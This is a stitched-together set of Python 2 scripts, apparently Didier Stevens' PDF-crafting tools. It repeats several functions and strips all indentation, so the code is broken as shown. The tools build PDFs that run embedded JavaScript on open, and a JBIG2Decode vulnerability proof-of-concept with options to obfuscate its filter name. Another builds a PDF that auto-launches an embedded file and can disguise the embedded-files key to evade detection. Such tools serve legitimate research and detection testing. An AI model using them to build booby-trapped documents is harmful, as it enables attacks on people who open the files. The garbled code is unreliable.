def Main():
if len(sys.argv) != 2:
print "Usage: make-pdf-helloworld pdf-file"
print " "
print " Source code put in the public domain by Didier Stevens, no Copyright"
print " Use at your own risk"
print " https://DidierStevens.com"
else:
pdffile = sys.argv[1]
oPDF = mPDF.cPDF(pdffile)
oPDF.header()
oPDF.template1()
#oPDF.stream(5, 0, "BT /F1 24 Tf 100 700 Td (Hello World) Tj ET")
oPDF.stream(
5, 0, """BT /F1 12 Tf 100 700 Td 15 TL
(Hello World) Tj
(Second Line) '
(Third Line) '
ET
100 712 100 -100 re S""")
oPDF.xrefAndTrailer("1 0 R")
def Main():
if len(sys.argv) != 2:
print "Usage: make-pdf-helloworld pdf-file"
print " "
print " Source code put in the public domain by Didier Stevens, no Copyright"
print " Use at your own risk"
print " https://DidierStevens.com"
else:
pdffile = sys.argv[1]
oPDF = mPDF.cPDF(pdffile)
oPDF.header()
oPDF.template1()
#oPDF.stream(5, 0, "BT /F1 24 Tf 100 700 Td (Hello World) Tj ET")
oPDF.stream(5, 0, """BT /F1 12 Tf 100 700 Td 15 TL
(Hello World) Tj
(Second Line) '
(Third Line) '
ET
100 712 100 -100 re S""")
oPDF.xrefAndTrailer("1 0 R")
def main(option, outputFile):
oPDF = mPDF.cPDF(outputFile)
oPDF.header()
oPDF.indirectobject(1, 0, '<<\n /Type /Catalog\n /Outlines 2 0 R\n /Pages 3 0 R\n /OpenAction 7 0 R\n>>')
oPDF.indirectobject(2, 0, '<<\n /Type /Outlines\n /Count 0\n>>')
oPDF.indirectobject(3, 0, '<<\n /Type /Pages\n /Kids [4 0 R]\n /Count 1\n>>')
oPDF.indirectobject(4, 0, '<<\n /Type /Page\n /Parent 3 0 R\n /MediaBox [0 0 612 792]\n /Contents 5 0 R\n /Resources <<\n /ProcSet [/PDF /Text]\n /Font << /F1 6 0 R >>\n >>\n>>')
oPDF.stream(5, 0, 'BT /F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET')
oPDF.indirectobject(6, 0, '<<\n /Type /Font\n /Subtype /Type1\n /Name /F1\n /BaseFont /Helvetica\n /Encoding /MacRomanEncoding\n>>')
if option == 0:
javascript = """app.alert({cMsg: 'Hello from PDF JavaScript', cTitle: 'Testing PDF JavaScript', nIcon: 3});"""
else:
javaScriptFile = option
try:
fileJavasScript = open(javaScriptFile, 'rb')
except:
print "File %s not found." % javaScriptFile
return
try:
javascript = fileJavasScript.read()
except:
print "Error reading %s" % javaScriptFile
return
finally:
fileJavasScript.close()
oPDF.indirectobject(7, 0, '<<\n /Type /Action\n /S /JavaScript\n /JS (%s)\n>>' % javascript)
oPDF.xrefAndTrailer('1 0 R')
def Main():
"""make-pdf-jbig2, create a JBIG2Decode vulnerability PoC PDF document
"""
oParser = optparse.OptionParser(usage='usage: %prog [options] pdf-file',
version='%prog ' + __version__)
oParser.add_option('-o',
'--obfuscation',
default='0',
help='select obfuscation level 0-3 (default 0)')
(options, args) = oParser.parse_args()
if len(args) != 1:
Usage(oParser)
elif not options.obfuscation in ['0', '1', '2', '3']:
Usage(oParser)
else:
oPDF = mPDF.cPDF(args[0])
oPDF.header()
oPDF.indirectobject(
1, 0, '<<\n /Type /Catalog\n /Outlines 2 0 R\n /Pages 3 0 R\n>>')
oPDF.indirectobject(2, 0, '<<\n /Type /Outlines\n /Count 0\n>>')
oPDF.indirectobject(
3, 0, '<<\n /Type /Pages\n /Kids [4 0 R]\n /Count 1\n>>')
oPDF.indirectobject(
4, 0,
'<<\n /Type /Page\n /Parent 3 0 R\n /MediaBox [0 0 612 792]\n /Contents 5 0 R\n /Resources <<\n /ProcSet [/PDF /Text]\n /Font << /F1 6 0 R >>\n >>\n>>'
)
if options.obfuscation == '0':
oPDF.stream(5, 0, '\x00\x00\x00\x01\x40\x00\x00\x33\x33\x33',
'<</Length %d /Filter /JBIG2Decode>>')
elif options.obfuscation == '1':
oPDF.stream(5, 0, '\x00\x00\x00\x01\x40\x00\x00\x33\x33\x33',
'<</Length %d /Filter /JBIG#32Decode>>')
elif options.obfuscation == '2':
oPDF.stream(
5, 0, '00000001400000333333>',
'<</Length %d /Filter [/ASCIIHexDecode /JBIG2Decode]>>')
elif options.obfuscation == '3':
oPDF.stream(
5, 0, '00000001400000333333>',
'<</Length %d /Filter [/ASCIIHexDecode /JBIG#32Decode]>>')
oPDF.indirectobject(
6, 0,
'<<\n /Type /Font\n /Subtype /Type1\n /Name /F1\n /BaseFont /Helvetica\n /Encoding /MacRomanEncoding\n>>'
)
oPDF.xrefAndTrailer('1 0 R')
def Main():
"""make-pdf-javascript, use it to create a PDF document with embedded JavaScript that will execute automatically when the document is opened
"""
parser = optparse.OptionParser(usage='usage: %prog [options] pdf-file', version='%prog 0.1')
parser.add_option('-j', '--javascript', help='javascript to embed (default embedded JavaScript is app.alert messagebox)')
parser.add_option('-f', '--javascriptfile', help='javascript file to embed (default embedded JavaScript is app.alert messagebox)')
(options, args) = parser.parse_args()
if len(args) != 1:
parser.print_help()
print ''
print ' make-pdf-javascript, use it to create a PDF document with embedded JavaScript that will execute automatically when the document is opened'
print ' Source code put in the public domain by Didier Stevens, no Copyright'
print ' Use at your own risk'
print ' https://DidierStevens.com'
else:
oPDF = mPDF.cPDF(args[0])
oPDF.header()
oPDF.indirectobject(1, 0, '<<\n /Type /Catalog\n /Outlines 2 0 R\n /Pages 3 0 R\n /OpenAction 7 0 R\n>>')
oPDF.indirectobject(2, 0, '<<\n /Type /Outlines\n /Count 0\n>>')
oPDF.indirectobject(3, 0, '<<\n /Type /Pages\n /Kids [4 0 R]\n /Count 1\n>>')
oPDF.indirectobject(4, 0, '<<\n /Type /Page\n /Parent 3 0 R\n /MediaBox [0 0 612 792]\n /Contents 5 0 R\n /Resources <<\n /ProcSet [/PDF /Text]\n /Font << /F1 6 0 R >>\n >>\n>>')
oPDF.stream(5, 0, 'BT /F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET')
oPDF.indirectobject(6, 0, '<<\n /Type /Font\n /Subtype /Type1\n /Name /F1\n /BaseFont /Helvetica\n /Encoding /MacRomanEncoding\n>>')
if options.javascript == None and options.javascriptfile == None:
javascript = """app.alert({cMsg: 'Hello from PDF JavaScript', cTitle: 'Testing PDF JavaScript', nIcon: 3});"""
elif options.javascript != None:
javascript = options.javascript
else:
try:
fileJavasScript = open(options.javascriptfile, 'rb')
except:
print "error opening file %s" % options.javascriptfile
return
try:
javascript = fileJavasScript.read()
except:
print "error reading file %s" % options.javascriptfile
return
finally:
fileJavasScript.close()
oPDF.indirectobject(7, 0, '<<\n /Type /Action\n /S /JavaScript\n /JS (%s)\n>>' % javascript)
oPDF.xrefAndTrailer('1 0 R')
def Main():
"""make-pdf-javascript, use it to create a PDF document with embedded JavaScript that will execute automatically when the document is opened
"""
parser = optparse.OptionParser(usage='usage: %prog [options] pdf-file', version='%prog 0.1')
parser.add_option('-j', '--javascript', help='javascript to embed (default embedded JavaScript is app.alert messagebox)')
parser.add_option('-f', '--javascriptfile', help='javascript file to embed (default embedded JavaScript is app.alert messagebox)')
(options, args) = parser.parse_args()
if len(args) != 1:
parser.print_help()
print ''
print ' make-pdf-javascript, use it to create a PDF document with embedded JavaScript that will execute automatically when the document is opened'
print ' Source code put in the public domain by Didier Stevens, no Copyright'
print ' Use at your own risk'
print ' https://DidierStevens.com'
else:
oPDF = mPDF.cPDF(args[0])
oPDF.header()
oPDF.indirectobject(1, 0, '<<\n /Type /Catalog\n /Outlines 2 0 R\n /Pages 3 0 R\n /OpenAction 7 0 R\n>>')
oPDF.indirectobject(2, 0, '<<\n /Type /Outlines\n /Count 0\n>>')
oPDF.indirectobject(3, 0, '<<\n /Type /Pages\n /Kids [4 0 R]\n /Count 1\n>>')
oPDF.indirectobject(4, 0, '<<\n /Type /Page\n /Parent 3 0 R\n /MediaBox [0 0 612 792]\n /Contents 5 0 R\n /Resources <<\n /ProcSet [/PDF /Text]\n /Font << /F1 6 0 R >>\n >>\n>>')
oPDF.stream(5, 0, 'BT /F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET')
oPDF.indirectobject(6, 0, '<<\n /Type /Font\n /Subtype /Type1\n /Name /F1\n /BaseFont /Helvetica\n /Encoding /MacRomanEncoding\n>>')
if options.javascript == None and options.javascriptfile == None:
javascript = """app.alert({cMsg: 'Hello from PDF JavaScript', cTitle: 'Testing PDF JavaScript', nIcon: 3});"""
elif options.javascript != None:
javascript = options.javascript
else:
try:
fileJavasScript = open(options.javascriptfile, 'rb')
except:
print "error opening file %s" % options.javascriptfile
return
try:
javascript = fileJavasScript.read()
except:
print "error reading file %s" % options.javascriptfile
return
finally:
fileJavasScript.close()
oPDF.indirectobject(7, 0, '<<\n /Type /Action\n /S /JavaScript\n /JS (%s)\n>>' % javascript)
oPDF.xrefAndTrailer('1 0 R')
def main(option, outputFile):
oPDF = mPDF.cPDF(outputFile)
oPDF.header()
oPDF.indirectobject(
1, 0,
'<<\n /Type /Catalog\n /Outlines 2 0 R\n /Pages 3 0 R\n /OpenAction 7 0 R\n>>'
)
oPDF.indirectobject(2, 0, '<<\n /Type /Outlines\n /Count 0\n>>')
oPDF.indirectobject(3, 0,
'<<\n /Type /Pages\n /Kids [4 0 R]\n /Count 1\n>>')
oPDF.indirectobject(
4, 0,
'<<\n /Type /Page\n /Parent 3 0 R\n /MediaBox [0 0 612 792]\n /Contents 5 0 R\n /Resources <<\n /ProcSet [/PDF /Text]\n /Font << /F1 6 0 R >>\n >>\n>>'
)
oPDF.stream(5, 0,
'BT /F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET')
oPDF.indirectobject(
6, 0,
'<<\n /Type /Font\n /Subtype /Type1\n /Name /F1\n /BaseFont /Helvetica\n /Encoding /MacRomanEncoding\n>>'
)
if option == 0:
javascript = """app.alert({cMsg: 'Hello from PDF JavaScript', cTitle: 'Testing PDF JavaScript', nIcon: 3});"""
else:
javaScriptFile = option
try:
fileJavasScript = open(javaScriptFile, 'rb')
except:
print "File %s not found." % javaScriptFile
return
try:
javascript = fileJavasScript.read()
except:
print "Error reading %s" % javaScriptFile
return
finally:
fileJavasScript.close()
oPDF.indirectobject(
7, 0,
'<<\n /Type /Action\n /S /JavaScript\n /JS (%s)\n>>' % javascript)
oPDF.xrefAndTrailer('1 0 R')
def CreatePDFWithEmbeddedFile(pdfFileName, embeddedFileName, embeddedFileContent, filters, nobinary, autoopen, button, stego, text):
"""Create a PDF document with an embedded file
"""
oPDF = mPDF.cPDF(pdfFileName)
oPDF.header()
if not nobinary:
oPDF.binary()
if stego:
embeddedFiles = 'Embeddedfiles'
else:
embeddedFiles = 'EmbeddedFiles'
if autoopen:
openAction = ' /OpenAction 9 0 R\n'
else:
openAction = ''
oPDF.indirectobject(1, 0, '<<\n /Type /Catalog\n /Outlines 2 0 R\n /Pages 3 0 R\n /Names << /%s << /Names [(%s) 7 0 R] >> >>\n%s>>' % (embeddedFiles, embeddedFileName, openAction))
oPDF.indirectobject(2, 0, '<<\n /Type /Outlines\n /Count 0\n>>')
oPDF.indirectobject(3, 0, '<<\n /Type /Pages\n /Kids [4 0 R]\n /Count 1\n>>')
if button:
annots = ' /Annots [10 0 R]\n'
else:
annots = ''
oPDF.indirectobject(4, 0, '<<\n /Type /Page\n /Parent 3 0 R\n /MediaBox [0 0 612 792]\n /Contents 5 0 R\n /Resources <<\n /ProcSet [/PDF /Text]\n /Font << /F1 6 0 R >>\n >>\n%s>>' % annots)
if text == '':
text = 'This PDF document embeds file %s' % embeddedFileName
textCommands = '/F1 12 Tf 70 700 Td 15 TL (%s) Tj' % text
if button:
textCommands += " () ' () ' (Click inside the rectangle to save %s to a temporary folder and launch it.) ' () ' (Click here) '" % embeddedFileName
oPDF.stream(5, 0, 'BT %s ET' % textCommands)
oPDF.indirectobject(6, 0, '<<\n /Type /Font\n /Subtype /Type1\n /Name /F1\n /BaseFont /Helvetica\n /Encoding /MacRomanEncoding\n>>')
oPDF.indirectobject(7, 0, '<<\n /Type /Filespec\n /F (%s)\n /EF << /F 8 0 R >>\n>>' % embeddedFileName)
oPDF.stream2(8, 0, embeddedFileContent, '/Type /EmbeddedFile', filters)
if autoopen or button:
oPDF.indirectobject(9, 0, '<<\n /Type /Action\n /S /JavaScript\n /JS (this.exportDataObject({ cName: "%s", nLaunch: 2 });)\n>>' % embeddedFileName)
if button:
oPDF.indirectobject(10, 0, '<<\n /Type /Annot\n /Subtype /Link\n /Rect [65 620 130 640]\n /Border [16 16 1]\n /A 9 0 R\n>>')
oPDF.xrefAndTrailer("1 0 R")
def CreatePDFWithEmbeddedFile(pdfFileName, embeddedFileName, embeddedFileContent, filters, nobinary, autoopen, button, stego, text):
"""Create a PDF document with an embedded file
"""
oPDF = mPDF.cPDF(pdfFileName)
oPDF.header()
if not nobinary:
oPDF.binary()
if stego:
embeddedFiles = 'Embeddedfiles'
else:
embeddedFiles = 'EmbeddedFiles'
if autoopen:
openAction = ' /OpenAction 9 0 R\n'
else:
openAction = ''
oPDF.indirectobject(1, 0, '<<\n /Type /Catalog\n /Outlines 2 0 R\n /Pages 3 0 R\n /Names << /%s << /Names [(%s) 7 0 R] >> >>\n%s>>' % (embeddedFiles, embeddedFileName, openAction))
oPDF.indirectobject(2, 0, '<<\n /Type /Outlines\n /Count 0\n>>')
oPDF.indirectobject(3, 0, '<<\n /Type /Pages\n /Kids [4 0 R]\n /Count 1\n>>')
if button:
annots = ' /Annots [10 0 R]\n'
else:
annots = ''
oPDF.indirectobject(4, 0, '<<\n /Type /Page\n /Parent 3 0 R\n /MediaBox [0 0 612 792]\n /Contents 5 0 R\n /Resources <<\n /ProcSet [/PDF /Text]\n /Font << /F1 6 0 R >>\n >>\n%s>>' % annots)
if text == '':
text = 'This PDF document embeds file %s' % embeddedFileName
textCommands = '/F1 12 Tf 70 700 Td 15 TL (%s) Tj' % text
if button:
textCommands += " () ' () ' (Click inside the rectangle to save %s to a temporary folder and launch it.) ' () ' (Click here) '" % embeddedFileName
oPDF.stream(5, 0, 'BT %s ET' % textCommands)
oPDF.indirectobject(6, 0, '<<\n /Type /Font\n /Subtype /Type1\n /Name /F1\n /BaseFont /Helvetica\n /Encoding /MacRomanEncoding\n>>')
oPDF.indirectobject(7, 0, '<<\n /Type /Filespec\n /F (%s)\n /EF << /F 8 0 R >>\n>>' % embeddedFileName)
oPDF.stream2(8, 0, embeddedFileContent, '/Type /EmbeddedFile', filters)
if autoopen or button:
oPDF.indirectobject(9, 0, '<<\n /Type /Action\n /S /JavaScript\n /JS (this.exportDataObject({ cName: "%s", nLaunch: 2 });)\n>>' % embeddedFileName)
if button:
oPDF.indirectobject(10, 0, '<<\n /Type /Annot\n /Subtype /Link\n /Rect [65 620 130 640]\n /Border [16 16 1]\n /A 9 0 R\n>>')
oPDF.xrefAndTrailer("1 0 R")
def Main():
"""make-pdf-jbig2, create a JBIG2Decode vulnerability PoC PDF document
"""
oParser = optparse.OptionParser(usage="usage: %prog [options] pdf-file", version="%prog " + __version__)
oParser.add_option("-o", "--obfuscation", default="0", help="select obfuscation level 0-3 (default 0)")
(options, args) = oParser.parse_args()
if len(args) != 1:
Usage(oParser)
elif not options.obfuscation in ["0", "1", "2", "3"]:
Usage(oParser)
else:
oPDF = mPDF.cPDF(args[0])
oPDF.header()
oPDF.indirectobject(1, 0, "<<\n /Type /Catalog\n /Outlines 2 0 R\n /Pages 3 0 R\n>>")
oPDF.indirectobject(2, 0, "<<\n /Type /Outlines\n /Count 0\n>>")
oPDF.indirectobject(3, 0, "<<\n /Type /Pages\n /Kids [4 0 R]\n /Count 1\n>>")
oPDF.indirectobject(
4,
0,
"<<\n /Type /Page\n /Parent 3 0 R\n /MediaBox [0 0 612 792]\n /Contents 5 0 R\n /Resources <<\n /ProcSet [/PDF /Text]\n /Font << /F1 6 0 R >>\n >>\n>>",
)
if options.obfuscation == "0":
oPDF.stream(5, 0, "\x00\x00\x00\x01\x40\x00\x00\x33\x33\x33", "<</Length %d /Filter /JBIG2Decode>>")
elif options.obfuscation == "1":
oPDF.stream(5, 0, "\x00\x00\x00\x01\x40\x00\x00\x33\x33\x33", "<</Length %d /Filter /JBIG#32Decode>>")
elif options.obfuscation == "2":
oPDF.stream(5, 0, "00000001400000333333>", "<</Length %d /Filter [/ASCIIHexDecode /JBIG2Decode]>>")
elif options.obfuscation == "3":
oPDF.stream(5, 0, "00000001400000333333>", "<</Length %d /Filter [/ASCIIHexDecode /JBIG#32Decode]>>")
oPDF.indirectobject(
6,
0,
"<<\n /Type /Font\n /Subtype /Type1\n /Name /F1\n /BaseFont /Helvetica\n /Encoding /MacRomanEncoding\n>>",
)
oPDF.xrefAndTrailer("1 0 R")
import mPDF
import time
import zlib
import sys
if len(sys.argv) != 2:
print "Usage: make-pdf-helloworld pdf-file"
print " "
print " Source code put in the public domain by Didier Stevens, no Copyright"
print " Use at your own risk"
print " https://DidierStevens.com"
else:
pdffile = sys.argv[1]
oPDF = mPDF.cPDF(pdffile)
oPDF.header()
oPDF.template1()
#oPDF.stream(5, 0, "BT /F1 24 Tf 100 700 Td (Hello World) Tj ET")
oPDF.stream(5, 0, """BT /F1 12 Tf 100 700 Td 15 TL
(Hello World) Tj
(Second Line) '
(Third Line) '
ET
100 712 100 -100 re S""")
oPDF.xrefAndTrailer("1 0 R")
import mPDF
import time
import zlib
import sys
if len(sys.argv) != 2:
print "Usage: make-pdf-helloworld pdf-file"
else:
pdffile = sys.argv[1]
oPDF = mPDF.cPDF(pdffile)
oPDF.header()
oPDF.template1()
#oPDF.stream(5, 0, "BT /F1 24 Tf 100 700 Td (Hello World) Tj ET")
oPDF.stream(
5, 0, """BT /F1 12 Tf 100 700 Td 15 TL
(Hello World) Tj
(Second Line) '
(Third Line) '
ET
100 712 100 -100 re S""")
oPDF.xrefAndTrailer("1 0 R")
# 20080518
# 20080519
import mPDF
import time
import zlib
import sys
oPDF = mPDF.cPDF('pdffile.pdf.txt')
oPDF.header()
oPDF.template1()
oPDF.stream(
5, 0, """BT /F1 12 Tf 100 700 Td 15 TL
(Hello World PDF Generated) Tj
(Second Line) '
(Third Line) '
ET
100 712 100 -100 re S""")
oPDF.stream(6, 0, "BT /F1 24 Tf 100 700 Td (Hello World) Tj ET")
oPDF.xrefAndTrailer("1 0 R")